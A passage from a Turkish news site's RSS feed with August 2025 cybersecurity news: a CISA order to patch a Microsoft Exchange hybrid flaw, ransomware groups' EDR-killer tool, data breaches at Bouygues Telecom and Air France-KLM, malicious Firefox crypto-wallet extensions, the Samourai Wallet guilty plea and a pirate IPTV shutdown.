<description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), CVE-2025-53786 olarak takip edilen kritik Microsoft Exchange açığının federal kurumlarda 11 Ağustos 2025 Pazartesi günü saat 09.00’a kadar kapatılmasını zorunlu tuttu. Açık, saldırganlara yerel Exchange sunucularından Microsoft bulut ortamlarına yatay hareket imkânı vererek tüm etki alanının ele geçirilmesine yol açabiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd0414ebe.webp" length="35192" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:27 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Microsoft Exchange CVE-2025-53786 açığı nasıl çalışıyor, CISA federal kurumlara hangi adımları zorunlu kıldı, saldırı ne zaman keşfedildi, özel şirketler için ne tür riskler var</media:keywords>
<content:encoded><![CDATA[<p data-start="539" data-end="913"><strong data-start="539" data-end="587">Açık hibrit Exchange yapılarını hedef alıyor</strong><br data-start="587" data-end="590">CVE-2025-53786 güvenlik açığı, Microsoft Exchange Server 2016, 2019 ve Subscription Edition sürümlerini etkiliyor. Hibrit yapılarda yerel sunucu ve Exchange Online arasında paylaşılan servis hesabı kullanılması nedeniyle, saldırganlar yetkili token veya API çağrılarını taklit ederek bulut tarafına erişim sağlayabiliyor.</p>
<p data-start="915" data-end="1168"><strong data-start="915" data-end="938">Tespit edilmesi zor</strong><br data-start="938" data-end="941">Microsoft’un açıklamasına göre, saldırılar yerel Exchange sunucularından geldiğinde Microsoft Purview gibi bulut tabanlı loglama araçları bu etkinlikleri kaydetmeyebiliyor. Bu durum saldırıların fark edilmesini güçleştiriyor.</p>
<p data-start="1170" data-end="1445"><strong data-start="1170" data-end="1207">Araştırmacı Black Hat’te gösterdi</strong><br data-start="1207" data-end="1210">Outsider Security’den araştırmacı Dirk-Jan Mollema, Black Hat konferansında açığı göstererek Microsoft’a üç hafta önce rapor ettiğini açıkladı. Microsoft, konferansla eş zamanlı olarak güvenlik duyurusu ve gerekli yamaları yayımladı.</p>
<p data-start="1447" data-end="1542"><strong data-start="1447" data-end="1484">Federal kurumlara zorunlu adımlar</strong><br data-start="1484" data-end="1487">CISA’nın 25-02 sayılı acil direktifine göre kurumlar:</p>
<ul data-start="1543" data-end="1916">
<li data-start="1543" data-end="1614">
<p data-start="1545" data-end="1614">Microsoft Health Checker script ile Exchange ortamlarını tarayacak,</p>
</li>
<li data-start="1615" data-end="1657">
<p data-start="1617" data-end="1657">Destek dışı sunucuları ağdan ayıracak,</p>
</li>
<li data-start="1658" data-end="1744">
<p data-start="1660" data-end="1744">Güncel kümülatif yamaları (Exchange 2019 için CU14/15, 2016 için CU23) yükleyecek,</p>
</li>
<li data-start="1745" data-end="1783">
<p data-start="1747" data-end="1783">Nisan 2025 hotfix’ini uygulayacak,</p>
</li>
<li data-start="1784" data-end="1916">
<p data-start="1786" data-end="1916">Ardından <code data-start="1795" data-end="1835">ConfigureExchangeHybridApplication.ps1</code> scripti ile paylaşımlı servis hesabından özel hibrit uygulamaya geçiş yapacak.</p>
</li>
</ul>
<p data-start="1918" data-end="2047">Kurumların teknik düzeltmeleri Pazartesi sabahına kadar tamamlaması ve aynı gün 17.00’ye kadar CISA’ya rapor sunması gerekiyor.</p>
<p data-start="2049" data-end="2244"><strong data-start="2049" data-end="2074">Tüm kuruluşlara uyarı</strong><br data-start="2074" data-end="2077">CISA, zorunluluk yalnızca federal kurumlar için geçerli olsa da, açığın tüm sektörlerde risk oluşturduğunu belirterek özel kuruluşları da güncelleme yapmaya çağırdı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Sekiz fidye yazılım grubu yeni EDR öldürücü aracı kullanıyor, güvenlik yazılımlarını devre dışı bırakıyor</title>
<link>https://www.ajansexpres.com.tr/sekiz-fidye-yazilim-grubu-yeni-edr-oeldurucu-araci-kullaniyor-guvenlik-yazilimlarini-devre-disi-birakiyor</link>
<guid>https://www.ajansexpres.com.tr/sekiz-fidye-yazilim-grubu-yeni-edr-oeldurucu-araci-kullaniyor-guvenlik-yazilimlarini-devre-disi-birakiyor</guid>
<description><![CDATA[ Sophos araştırmacılarına göre RansomHub tarafından geliştirilen “EDRKillShifter” aracının gelişmiş bir versiyonu, sekiz farklı fidye yazılım grubu tarafından saldırılarda kullanılıyor. Araç, Sophos, Microsoft Defender, Kaspersky, Trend Micro, SentinelOne gibi önde gelen güvenlik ürünlerini devre dışı bırakarak sistemlerin şifrelenmesini kolaylaştırıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccff8d2da.webp" length="46680" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:23 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Yeni EDR öldürücü araç nasıl çalışıyor, hangi fidye yazılım grupları bu aracı kullanıyor, hedef alınan güvenlik ürünleri hangileri, araç farklı gruplara nasıl yayıldı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="521" data-end="869"><strong data-start="521" data-end="548">Yeni EDR öldürücü aracı</strong><br data-start="548" data-end="551">Sophos’un raporuna göre, fidye yazılım grupları tarafından kullanılan yeni EDR öldürücü aracı, güvenlik çözümlerini devre dışı bırakarak saldırganların ağlarda fark edilmeden hareket etmesine olanak sağlıyor. Araç, RansomHub, Blacksuit, Medusa, Qilin, Dragonforce, Crytox, Lynx ve INC grupları tarafından kullanıldı.</p>
<p data-start="871" data-end="1181"><strong data-start="871" data-end="912">BYOVD yöntemiyle kernel ayrıcalıkları</strong><br data-start="912" data-end="915">Araç, zararlı bir sürücüyü (çoğu zaman çalıntı ya da süresi dolmuş dijital sertifikayla imzalanmış) yükleyerek “Bring Your Own Vulnerable Driver” (BYOVD) saldırısı gerçekleştiriyor. Böylece çekirdek seviyesinde ayrıcalık kazanarak güvenlik yazılımlarını kapatıyor.</p>
<p data-start="1183" data-end="1417"><strong data-start="1183" data-end="1218">Hedef alınan güvenlik çözümleri</strong><br data-start="1218" data-end="1221">Saldırının hedefinde Sophos, Microsoft Defender, Kaspersky, Symantec, Trend Micro, SentinelOne, Cylance, McAfee, F-Secure, HitmanPro ve Webroot gibi çok sayıda EDR ve antivirüs ürünü yer alıyor.</p>
<p data-start="1419" data-end="1727"><strong data-start="1419" data-end="1458">Paylaşılan bir geliştirme altyapısı</strong><br data-start="1458" data-end="1461">Sophos, aracın tek bir sızıntı sonucu yayılmadığını, farklı fidye yazılım gruplarının aynı çerçeve üzerinden kendi sürümlerini oluşturduğunu belirtiyor. Tüm varyantlarda HeartCrypt paketleyicisinin kullanıldığı ve bilgi/araç paylaşımının yoğun olduğu ifade edildi.</p>
<p data-start="1729" data-end="1992"><strong data-start="1729" data-end="1771">Benzer araçlar daha önce de kullanıldı</strong><br data-start="1771" data-end="1774">EDRKillShifter dışında, AuKill ve AvNeutralizer gibi araçlar da farklı gruplar tarafından güvenlik yazılımlarını etkisiz hale getirmek için kullanılmıştı. Bu yöntem, fidye yazılım ekosisteminde giderek yaygınlaşıyor.</p>
<p data-start="1994" data-end="2179"><strong data-start="1994" data-end="2006"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Bouygues Telecom’da veri ihlali: 6,4 milyon müşterinin kişisel bilgileri sızdırıldı</title>
<link>https://www.ajansexpres.com.tr/bouygues-telecomda-veri-ihlali-64-milyon-musterinin-kisisel-bilgileri-sizdirildi</link>
<guid>https://www.ajansexpres.com.tr/bouygues-telecomda-veri-ihlali-64-milyon-musterinin-kisisel-bilgileri-sizdirildi</guid>
<description><![CDATA[ Fransa’nın en büyük telekom şirketlerinden Bouygues Telecom, 4 Ağustos 2025’te gerçekleşen siber saldırıda 6,4 milyon müşteriye ait kişisel verilerin ele geçirildiğini açıkladı. Şirket, kredi kartı bilgilerinin ve şifrelerin etkilenmediğini duyurdu ancak IBAN, iletişim ve sözleşme bilgilerinin sızdırıldığını bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccfb1cdbc.webp" length="41314" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:19 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Bouygues Telecom veri ihlalinde hangi bilgiler sızdırıldı, saldırı ne zaman gerçekleşti, müşteriler için hangi riskler oluştu, şirket hangi önlemleri aldı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="463" data-end="795"><strong data-start="463" data-end="499">Saldırı 4 Ağustos’ta gerçekleşti</strong><br data-start="499" data-end="502">Bouygues Telecom, 4 Ağustos 2025 Pazar günü bir siber saldırıya uğradığını ve yetkisiz erişim sonucu 6,4 milyon müşteriye ait kişisel verilerin ele geçirildiğini doğruladı. Şirketin teknik ekipleri saldırıya hızlı şekilde müdahale ettiklerini ve ek güvenlik önlemlerinin alındığını açıkladı.</p>
<p data-start="797" data-end="1147"><strong data-start="797" data-end="828">Etkilenen müşteri bilgileri</strong><br data-start="828" data-end="831">Yapılan açıklamaya göre saldırıda ele geçirilen veriler arasında müşterilerin iletişim bilgileri, sözleşme detayları, medeni durum verileri, kurumsal müşterilere ait şirket bilgileri ve IBAN numaraları bulunuyor. Şirket, kredi kartı bilgilerinin ve müşteri hesap şifrelerinin bu ihlalden etkilenmediğini vurguladı.</p>
<p data-start="1149" data-end="1539"><strong data-start="1149" data-end="1179">Yetkililer bilgilendirildi</strong><br data-start="1179" data-end="1182">Bouygues Telecom, saldırının bilinen bir siber suç grubu tarafından şirket içi kaynaklar hedef alınarak gerçekleştirildiğini belirtti. Konuyla ilgili olarak Fransa Ulusal Siber Güvenlik Ajansı (ANSSI) ve Kişisel Verileri Koruma Kurumu (CNIL) bilgilendirildi. Saldırıyı düzenleyenler için 5 yıla kadar hapis ve 150 bin euroya kadar para cezası öngörülüyor.</p>
<p data-start="1541" data-end="1953"><strong data-start="1541" data-end="1579">Müşterilere dolandırıcılık uyarısı</strong><br data-start="1579" data-end="1582">Şirket, müşterilerini SMS ve e-posta yoluyla bilgilendirmeye başladı. Açıklamada, kimlik avı ve sahte aramalara karşı dikkatli olunması gerektiği, hesap bilgilerini isteyen kişilere güvenilmemesi gerektiği uyarısı yapıldı. Ayrıca, IBAN bilgilerinin tek başına işlem için yeterli olmamasına rağmen müşterilerin hesap hareketlerini yakından takip etmeleri tavsiye edildi.</p>
<p data-start="1955" data-end="2260"><strong data-start="1955" data-end="1998">Fransız telekom sektöründe artan tehdit</strong><br data-start="1998" data-end="2001">Bouygues Telecom’daki ihlal, sadece bir hafta önce Orange’ın yaşadığı ağ saldırısının ardından geldi. Avrupa’daki bu gelişmeler, ABD merkezli telekom şirketlerini hedef alan ve Çin bağlantılı Salt Typhoon grubuna atfedilen saldırılarla benzerlik gösteriyor.</p>
<p data-start="2262" data-end="2435"><strong data-start="2262" data-end="2274"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>SonicWall: Akira saldırıları sıfır gün değil, 2024’te yamalanan SSLVPN açığı hedef alındı</title>
<link>https://www.ajansexpres.com.tr/sonicwall-akira-saldirilari-sifir-gun-degil-2024te-yamalanan-sslvpn-acigi-hedef-alindi</link>
<guid>https://www.ajansexpres.com.tr/sonicwall-akira-saldirilari-sifir-gun-degil-2024te-yamalanan-sslvpn-acigi-hedef-alindi</guid>
<description><![CDATA[ SonicWall, Gen 7 güvenlik duvarlarını hedef alan son Akira fidye yazılımı saldırılarının yeni bir sıfır gün açığa değil, 2024’te yamalanan CVE-2024-40766 güvenlik açığına dayandığını açıkladı. Şirket, etkilenen sistemlerde şifre sıfırlama adımının atlandığını, kullanıcıların acilen yazılım güncellemesi ve parola yenilemesi yapması gerektiğini duyurdu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccf6a89d6.webp" length="31186" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:14 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>SonicWall saldırılarında sıfır gün mü kullanıldı, CVE-2024-40766 açığı neye sebep oluyor, hangi yanlış adımlar saldırıları kolaylaştırdı, kullanıcılar hangi güvenlik önlemlerini almalı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="503" data-end="811"><strong data-start="503" data-end="535">Sıfır gün iddiası reddedildi</strong><br data-start="535" data-end="538">Geçtiğimiz hafta Arctic Wolf Labs, SonicWall Gen 7 cihazlarını hedef alan saldırıların sıfır gün açığa işaret edebileceğini duyurmuştu. Ancak SonicWall, yaptığı incelemeler sonucunda saldırıların CVE-2024-40766 adlı bilinen bir zafiyet üzerinden gerçekleştiğini bildirdi.</p>
<p data-start="813" data-end="1063"><strong data-start="813" data-end="837">CVE-2024-40766 nedir</strong><br data-start="837" data-end="840">Bu açık, SonicOS yazılımındaki SSLVPN erişim kontrol zafiyeti nedeniyle yetkisiz kişilerin VPN oturumlarını ele geçirmesine imkân tanıyor. Açık, Ağustos 2024’te yayımlanan SNWLID-2024-0015 danışma belgesiyle duyurulmuştu.</p>
<p data-start="1065" data-end="1417"><strong data-start="1065" data-end="1103">Migrasyon hataları istismar edildi</strong><br data-start="1103" data-end="1106">SonicWall, 40 farklı olayın incelenmesi sonucunda pek çok vakada Gen 6’dan Gen 7’ye geçişte yerel kullanıcı parolalarının sıfırlanmadığını ve bunun saldırganların sisteme erişimini kolaylaştırdığını belirtti. Oysa parolaların sıfırlanması, orijinal güvenlik tavsiyelerinde kritik bir adım olarak açıklanmıştı.</p>
<p data-start="1419" data-end="1694"><strong data-start="1419" data-end="1444">Yeni önerilen adımlar</strong><br data-start="1444" data-end="1447">Şirket, kullanıcıların cihaz yazılımını 7.3.0 veya daha yeni sürümlere yükseltmesini, SSLVPN için kullanılan tüm yerel hesap parolalarının derhal sıfırlanmasını ve mümkünse erişimin yalnızca güvenilir IP’lerle sınırlandırılmasını tavsiye ediyor.</p>
<p data-start="1696" data-end="2040"><strong data-start="1696" data-end="1732">Kullanıcıların şüpheleri sürüyor</strong><br data-start="1732" data-end="1735">Buna rağmen bazı kullanıcılar, Reddit’te yaptıkları yorumlarda SonicWall’ın açıklamalarının kendi deneyimleriyle örtüşmediğini, hatta bazı log dosyalarının incelenmediğini iddia etti. Bu nedenle uzmanlar, resmi açıklamaların ötesinde yüksek düzeyde dikkat ve hızlı önlem alınması gerektiğini vurguluyor.</p>
<p data-start="2042" data-end="2245"><strong data-start="2042" data-end="2054"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Firefox eklenti mağazasında 150 sahte kripto cüzdanı uzantısı: Kullanıcılardan 1 milyon dolar çalındı</title>
<link>https://www.ajansexpres.com.tr/firefox-eklenti-magazasinda-150-sahte-kripto-cuzdani-uzantisi-kullanicilardan-1-milyon-dolar-calindi</link>
<guid>https://www.ajansexpres.com.tr/firefox-eklenti-magazasinda-150-sahte-kripto-cuzdani-uzantisi-kullanicilardan-1-milyon-dolar-calindi</guid>
<description><![CDATA[ “GreedyBear” adlı kampanyayla Mozilla’nın Firefox eklenti mağazasına yüklenen 150 zararlı uzantı, MetaMask ve TronLink gibi popüler cüzdanları taklit ederek kullanıcıların kripto cüzdan bilgilerini ele geçirdi. Koi Security’ye göre saldırganlar yaklaşık 1 milyon dolar değerinde kripto varlığı çaldı. Mozilla, uzantıları mağazadan kaldırdı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccf22c78e.webp" length="30730" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:10 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>GreedyBear kampanyası Firefox mağazasında nasıl yayıldı, hangi bilgileri hedef aldı, saldırganlar ne kadar kripto para çaldı, Chrome mağazasına yayılma riski var mı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="502" data-end="768"><strong data-start="502" data-end="544">Sahte cüzdan uzantıları mağazaya sızdı</strong><br data-start="544" data-end="547">Koi Security’nin bulgularına göre saldırganlar, sahte kripto cüzdanı uzantılarını ilk etapta zararsız görünecek şekilde mağazaya yükledi. Onay aldıktan sonra ise marka ve logoları değiştirip zararlı kod enjekte ettiler.</p>
<p data-start="770" data-end="1043"><strong data-start="770" data-end="815">Kullanıcı bilgileri keylogger ile çalındı</strong><br data-start="815" data-end="818">Uzantılara entegre edilen kod, kullanıcıların cüzdan giriş bilgilerini eklenti pencerelerindeki form alanlarından kaydederek saldırganların kontrolündeki uzak sunuculara gönderdi. Ayrıca kurbanların IP adresleri de izlendi.</p>
<p data-start="1045" data-end="1401"><strong data-start="1045" data-end="1076">Sahte sitelerle desteklendi</strong><br data-start="1076" data-end="1079">Kampanyaya paralel olarak, Trezor ve Jupiter Wallet gibi bilinen cüzdan sağlayıcılarını taklit eden çok sayıda sahte web sitesi açıldı. Bu siteler, LummaStealer gibi bilgi hırsızları ve fidye yazılımları dahil 500’den fazla zararlı yazılımın dağıtımını yaptı. Tüm operasyon, 185.208.156.66 IP adresi üzerinden yönetildi.</p>
<p data-start="1403" data-end="1631"><strong data-start="1403" data-end="1436">AI desteğiyle ölçeklendirildi</strong><br data-start="1436" data-end="1439">Araştırmaya göre kampanyada kullanılan kodlarda yapay zekâ izleri görüldü. Bu sayede saldırganların farklı yükler geliştirmesi, tespitten kaçınması ve saldırıları hızla büyütmesi kolaylaştı.</p>
<p data-start="1633" data-end="1892"><strong data-start="1633" data-end="1665">Mozilla eklentileri kaldırdı</strong><br data-start="1665" data-end="1668">Mozilla, şikâyetlerin ardından uzantıları mağazadan kaldırdı. Ancak kampanyanın büyüklüğü, daha önce Haziran 2025’te devreye alınan koruma sistemine rağmen sahte cüzdan uzantılarının hâlâ mağazaya sızabildiğini gösteriyor.</p>
<p data-start="1894" data-end="2104"><strong data-start="1894" data-end="1931">Chrome mağazasına da sıçrayabilir</strong><br data-start="1931" data-end="1934">Koi Security, GreedyBear grubunun Chrome Web Store’a da geçmeyi planladığını ve şimdiden “Filecoin Wallet” adlı sahte bir Chrome uzantısının tespit edildiğini bildirdi.</p>
<p data-start="2106" data-end="2345"><strong data-start="2106" data-end="2136">Kullanıcılar için öneriler</strong><br data-start="2136" data-end="2139">Uzmanlar, eklenti kurmadan önce yayıncı bilgilerini ve kullanıcı yorumlarını kontrol etmeyi, resmi cüzdan projelerinin yalnızca kendi sitelerinden yönlendirdiği bağlantılarla indirilmesini tavsiye ediyor.</p>
<p data-start="2347" data-end="2530"><strong data-start="2347" data-end="2359"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Samourai Wallet kurucuları 200 milyon doları aşkın kara para aklamaktan suçunu kabul etti</title>
<link>https://www.ajansexpres.com.tr/samourai-wallet-kuruculari-200-milyon-dolari-askin-kara-para-aklamaktan-sucunu-kabul-etti</link>
<guid>https://www.ajansexpres.com.tr/samourai-wallet-kuruculari-200-milyon-dolari-askin-kara-para-aklamaktan-sucunu-kabul-etti</guid>
<description><![CDATA[ ABD Adalet Bakanlığı’na göre, kripto karıştırıcı hizmeti Samourai Wallet’ın CEO’su Keonne Rodriguez ve CTO’su William Lonergan Hill, suç gelirlerini aklamaya yardım ettiklerini kabul etti. Kurucular, beş yıla kadar hapis cezasıyla karşı karşıya ve 237 milyon dolardan fazla tutarı devlete devretmeyi kabul etti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cced1c12b.webp" length="62010" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:05 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Samourai Wallet kurucuları hangi suçları kabul etti, kara para aklama faaliyetinde ne kadar Bitcoin işlendi, uygulama ne zaman kapatıldı, kurucuların cezası ne olabilir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="461" data-end="729"><strong data-start="461" data-end="489">Kara para aklama itirafı</strong><br data-start="489" data-end="492">Rodriguez ve Hill, Samourai Wallet üzerinden kara para aklama faaliyetlerine bilerek aracılık ettiklerini kabul etti. İkilinin, suç gelirlerinin gizlenmesini sağlamak için “Whirlpool” ve “Ricochet” adlı hizmetleri sunduğu ortaya çıktı.</p>
<p data-start="731" data-end="998"><strong data-start="731" data-end="757">80 bin Bitcoin işlendi</strong><br data-start="757" data-end="760">Mahkeme belgelerine göre, 2015–2024 yılları arasında hizmet aracılığıyla 80 binden fazla Bitcoin (2 milyar doların üzerinde) yasa dışı kaynaktan geçirilerek karıştırıldı. Bu işlemlerden yaklaşık 6 milyon dolar hizmet ücreti elde edildi.</p>
<p data-start="1000" data-end="1264"><strong data-start="1000" data-end="1027">Tutuklamalar ve kapatma</strong><br data-start="1027" data-end="1030">Kurucular Nisan 2024’te tutuklandı. Aynı gün İzlanda polisi Samourai’nin internet alan adlarını ve sunucularını ele geçirdi, Google ise uygulamayı Play Store’dan kaldırdı. Uygulama, kapanmadan önce 100 binden fazla kez indirilmişti.</p>
<p data-start="1266" data-end="1512"><strong data-start="1266" data-end="1292">Suçun bilincindeydiler</strong><br data-start="1292" data-end="1295">Savcıların aktardığına göre, Rodriguez WhatsApp yazışmalarında “karıştırmayı bitcoin için kara para aklama” olarak tanımladı. Hill ise karanlık ağ forumlarında Samourai’yi “kirli BTC temizleme aracı” olarak tanıttı.</p>
<p data-start="1514" data-end="1848"><strong data-start="1514" data-end="1549">Mahkeme süreci ve ceza ihtimali</strong><br data-start="1549" data-end="1552">İkili, suçunu kabul ederek kara para aklama operasyonunu yürüttüğünü kabul etti. Anlaşma kapsamında 237,8 milyon dolar tutarında varlığı devlete bırakacaklar. Rodriguez ve Hill, para aklama suçlamasında 20 yıla kadar, izinsiz para transferi suçlamasında ise 5 yıla kadar hapisle yargılanıyordu.</p>
<p data-start="1850" data-end="2037"><strong data-start="1850" data-end="1862"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>28 bin kanal sunan dev korsan IPTV platformu Rare Breed TV kapatıldı</title>
<link>https://www.ajansexpres.com.tr/28-bin-kanal-sunan-dev-korsan-iptv-platformu-rare-breed-tv-kapatildi</link>
<guid>https://www.ajansexpres.com.tr/28-bin-kanal-sunan-dev-korsan-iptv-platformu-rare-breed-tv-kapatildi</guid>
<description><![CDATA[ Kreatiflik ve Eğlence İttifakı (ACE), 100 binden fazla film ve dizi içeriği ile 28 bin kanalı izinsiz yayınlayan Rare Breed TV’nin kapatıldığını açıkladı. Kuzey Carolina merkezli işletmeciler, finansal tazminat ödemeyi ve korsan yayını kalıcı olarak durdurmayı kabul etti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cce80ed7d.webp" length="56642" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:59 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Rare Breed TV hangi içerikleri sunuyordu, ACE ile nasıl bir anlaşmaya varıldı, platform neden kapatıldı, daha önce hangi korsan yayın servisleri hedef alındı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="401" data-end="672"><strong data-start="401" data-end="437">Yıllardır korsan yayın yapıyordu</strong><br data-start="437" data-end="440">Kuzey Carolina merkezli Rare Breed TV, dünyanın en büyük korsan IPTV hizmetlerinden biri olarak öne çıkıyordu. Platform, aylık 15,99 dolardan başlayan aboneliklerle binlerce canlı kanal ve 14 bini aşkın film-dizi arşivi sunuyordu.</p>
<p data-start="674" data-end="988"><strong data-start="674" data-end="701">ACE’den yaptırım kararı</strong><br data-start="701" data-end="704">Amazon, Netflix, Disney, Warner Bros. ve Apple TV+ gibi 50’den fazla şirketin yer aldığı ACE, korsan IPTV hizmetini tespit ettikten sonra işletmecilerle iletişime geçti. Taraflar arasında varılan anlaşmayla platformun kapatılması ve ciddi miktarda tazminat ödenmesi kararlaştırıldı.</p>
<p data-start="990" data-end="1215"><strong data-start="990" data-end="1017">Site hâlen erişime açık</strong><br data-start="1017" data-end="1020">ACE açıklamasına rağmen Rare Breed TV’nin web sitesinin habere konu tarihte hâlâ erişime açık olduğu ve abonelik satışına devam ettiği görüldü. Konuyla ilgili olarak ACE’den ek yorum alınamadı.</p>
<p data-start="1217" data-end="1647"><strong data-start="1217" data-end="1263">Küresel korsan yayın operasyonları hedefte</strong><br data-start="1263" data-end="1266">ACE, bugüne kadar Openload, Streamango, Beast IPTV, 123movies.la ve anime platformu Zoro.to gibi çok sayıda korsan servisi kapattı. Geçtiğimiz yıl Jetflicks davasında beş kişiye ceza verilmesine, 22 milyon kullanıcılı ve aylık 250 milyon euro gelir elde eden bir korsan ağının çökertilmesine ve 821 milyon yıllık ziyaretçiye sahip Markkystreams’in kapatılmasına da katkı sağladı.</p>
<p data-start="1649" data-end="1917"><strong data-start="1649" data-end="1676">Uyarı niteliğinde mesaj</strong><br data-start="1676" data-end="1679">ACE’nin bağlı olduğu Sinema Filmleri Derneği (MPA) Başkan Yardımcısı Larissa Knapp, “Bu yaptırım korsan yayıncılara ciddi bir uyarıdır. Yasadışı yayın hizmeti işletmek, davalar, ağır mali cezalar ve kalıcı kapatmalarla sonuçlanır” dedi.</p>
<p data-start="1919" data-end="2095"><strong data-start="1919" data-end="1931"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Air France ve KLM müşteri verilerinin sızdırıldığını açıkladı: Ödül programı bilgileri ve iletişim verileri ele geçirildi</title>
<link>https://www.ajansexpres.com.tr/air-france-ve-klm-musteri-verilerinin-sizdirildigini-acikladi-odul-programi-bilgileri-ve-iletisim-verileri-ele-gecirildi</link>
<guid>https://www.ajansexpres.com.tr/air-france-ve-klm-musteri-verilerinin-sizdirildigini-acikladi-odul-programi-bilgileri-ve-iletisim-verileri-ele-gecirildi</guid>
<description><![CDATA[ Air France ve KLM, dış müşteri hizmeti platformuna yönelik saldırıda bazı müşteri bilgilerinin yetkisiz kişilerce erişildiğini duyurdu. İsim, e-posta, telefon numarası, ödül programı bilgileri ve son işlem detayları sızdırılırken, finansal verilerin etkilenmediği belirtildi. Olay, ShinyHunters grubunun Salesforce tabanlı saldırı kampanyasıyla ilişkilendiriliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cce361d88.webp" length="30334" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:55 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Air France ve KLM veri ihlalinde hangi bilgiler sızdırıldı, saldırı hangi platformda gerçekleşti, olay hangi hacker gruplarıyla ilişkilendiriliyor, müşterilere hangi uyarılar yapıldı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="546" data-end="826"><strong data-start="546" data-end="598">Saldırı müşteri hizmeti platformunda gerçekleşti</strong><br data-start="598" data-end="601">Air France ve KLM, 6 Ağustos 2025’te yaptıkları açıklamada, kullandıkları harici müşteri hizmeti platformunda olağandışı hareket tespit edildiğini ve bunun sonucunda müşteri verilerine yetkisiz erişim sağlandığını açıkladı.</p>
<p data-start="828" data-end="1105"><strong data-start="828" data-end="860">Finansal veriler etkilenmedi</strong><br data-start="860" data-end="863">Şirketten yapılan duyuruda, saldırganların isim, e-posta adresi, telefon numarası, ödül programı bilgileri ve son işlem kayıtlarına ulaştığı, ancak müşterilerin finansal bilgilerinin ve kişisel güvenlik verilerinin etkilenmediği vurgulandı.</p>
<p data-start="1107" data-end="1385"><strong data-start="1107" data-end="1158">Yetkililer bilgilendirildi, müşteriler uyarıldı</strong><br data-start="1158" data-end="1161">KLM, olayı Hollanda Veri Koruma Kurumu’na, Air France ise Fransa’daki CNIL’e bildirdi. Etkilenen müşterilere uyarı mesajları gönderilerek şüpheli e-posta ve telefon aramalarına karşı dikkatli olmaları gerektiği belirtildi.</p>
<p data-start="1387" data-end="1682"><strong data-start="1387" data-end="1422">ShinyHunters grubuna bağlanıyor</strong><br data-start="1422" data-end="1425">BleepingComputer’un ulaştığı bilgilere göre olay, Salesforce platformlarını hedef alan ve Adidas, Qantas, Dior, Louis Vuitton, Chanel, Tiffany & Co. ile Google gibi markaları da etkileyen ShinyHunters grubunun sosyal mühendislik saldırılarıyla bağlantılı.</p>
<p data-start="1684" data-end="1946"><strong data-start="1684" data-end="1727">Havacılık sektörü saldırıların odağında</strong><br data-start="1727" data-end="1730">Air France–KLM olayı, son dönemde havacılık ve ulaşım sektörüne yönelen saldırıların bir parçası olarak değerlendiriliyor. Daha önce Scattered Spider grubu WestJet ve Hawaiian Airlines gibi firmaları hedef almıştı.</p>
<p data-start="1948" data-end="2149"><strong data-start="1948" data-end="1960"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Akira fidye yazılımı, Intel CPU ayar sürücüsünü kötüye kullanarak Microsoft Defender’ı devre dışı bırakıyor</title>
<link>https://www.ajansexpres.com.tr/akira-fidye-yazilimi-intel-cpu-ayar-surucusunu-koetuye-kullanarak-microsoft-defenderi-devre-disi-birakiyor</link>
